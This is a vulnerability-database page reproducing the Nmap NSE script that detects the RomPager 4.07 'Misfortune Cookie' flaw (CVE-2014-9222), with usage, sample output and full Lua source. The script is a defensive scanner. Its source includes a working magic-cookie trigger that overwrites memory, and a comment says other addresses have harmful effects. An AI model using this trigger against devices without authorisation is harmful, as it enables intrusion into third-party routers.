Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nmapAndrew OrrNMAP:HTTP-VULN-MISFORTUNE-COOKIE.NSE
HistoryMay 31, 2015 - 6:34 p.m.

http-vuln-misfortune-cookie NSE Script

2015-05-3118:34:22
Andrew Orr
nmap.org
434

0.973 High

EPSS

Percentile

99.9%

JSON

Detects the RomPager 4.07 Misfortune Cookie vulnerability by safely exploiting it.

See also:

Script Arguments

slaxml.debug

See the documentation for the slaxml library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

vulns.short, vulns.showall

See the documentation for the vulns library.

Example Usage

nmap <target> -p 7547 --script=http-vuln-misfortune-cookie

Script Output

PORT   STATE SERVICE REASON
7547/tcp open  unknown syn-ack
| http-vuln-misfortune-cookie:
|   VULNERABLE:
|   RomPager 4.07 Misfortune Cookie
|     State: VULNERABLE
|     IDs:  BID:71744  CVE:CVE-2014-9222
|     Description:
| The cookie handling routines in RomPager 4.07 are vulnerable to remote code
| execution. This script has verified the vulnerability by exploiting the web
| server in a safe manner.
|     References:
|       http://www.kb.cert.org/vuls/id/561444
|       http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf
|       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9222
|       http://www.checkpoint.com/blog/fortune-cookie-hole-internet-gateway/index.html
|_      http://www.securityfocus.com/bid/71744

Requires

description = [[Detects the RomPager 4.07 Misfortune Cookie vulnerability by safely exploiting it.]]

author = "Andrew Orr"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive"}

---
-- @see http-vuln-cve2013-6786.nse
--
-- @usage
-- nmap <target> -p 7547 --script=http-vuln-misfortune-cookie
--
-- @output
-- PORT   STATE SERVICE REASON
-- 7547/tcp open  unknown syn-ack
-- | http-vuln-misfortune-cookie:
-- |   VULNERABLE:
-- |   RomPager 4.07 Misfortune Cookie
-- |     State: VULNERABLE
-- |     IDs:  BID:71744  CVE:CVE-2014-9222
-- |     Description:
-- | The cookie handling routines in RomPager 4.07 are vulnerable to remote code
-- | execution. This script has verified the vulnerability by exploiting the web
-- | server in a safe manner.
-- |     References:
-- |       http://www.kb.cert.org/vuls/id/561444
-- |       http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf
-- |       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9222
-- |       http://www.checkpoint.com/blog/fortune-cookie-hole-internet-gateway/index.html
-- |_      http://www.securityfocus.com/bid/71744

local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"

portrule = shortport.port_or_service(7547, "http")

-- This memory address overwrites the request URI.
-- Other addresses may have other effects, some harmful.
local MAGIC_COOKIE = "C107373883"

local function vuln_to_misfortune_cookie(host, port)
  local request_path = "/nmap_test"
  local options = { cookies = MAGIC_COOKIE .. "=" .. request_path }
  local flag = request_path .. "' was not found on the RomPager server."
  local req = http.get(host, port, "/", options)
  if not(http.response_contains(req, flag)) then
    return false
  end
  return true
end

action = function(host, port)
  local vuln = {
    title = "RomPager 4.07 Misfortune Cookie",
    state = vulns.STATE.NOT_VULN,
    IDS = { CVE = 'CVE-2014-9222', BID = '71744' },
    description = [[
The cookie handling routines in RomPager 4.07 are vulnerable to remote code
execution. This script has verified the vulnerability by exploiting the web
server in a safe manner.]],
    references = {
      "http://www.checkpoint.com/blog/fortune-cookie-hole-internet-gateway/index.html",
      "http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf",
      "http://www.kb.cert.org/vuls/id/561444"
    }
  }
  local report = vulns.Report:new(SCRIPT_NAME, host, port)

  if vuln_to_misfortune_cookie(host, port) then
    vuln.state = vulns.STATE.VULN
  else
    vuln.state = vulns.STATE.NOT_VULN
  end

  return report:make_output(vuln)
end

Related

nmap 199
nmap
nmap
freelancer-info NSE Script
2013-11-20 04:31:31
telnet-encryption NSE Script
2011-12-28 00:57:48
mmouse-brute NSE Script
2012-05-01 14:29:36

0.973 High

EPSS

Percentile

99.9%

JSON
Related for NMAP:HTTP-VULN-MISFORTUNE-COOKIE.NSE
nmap199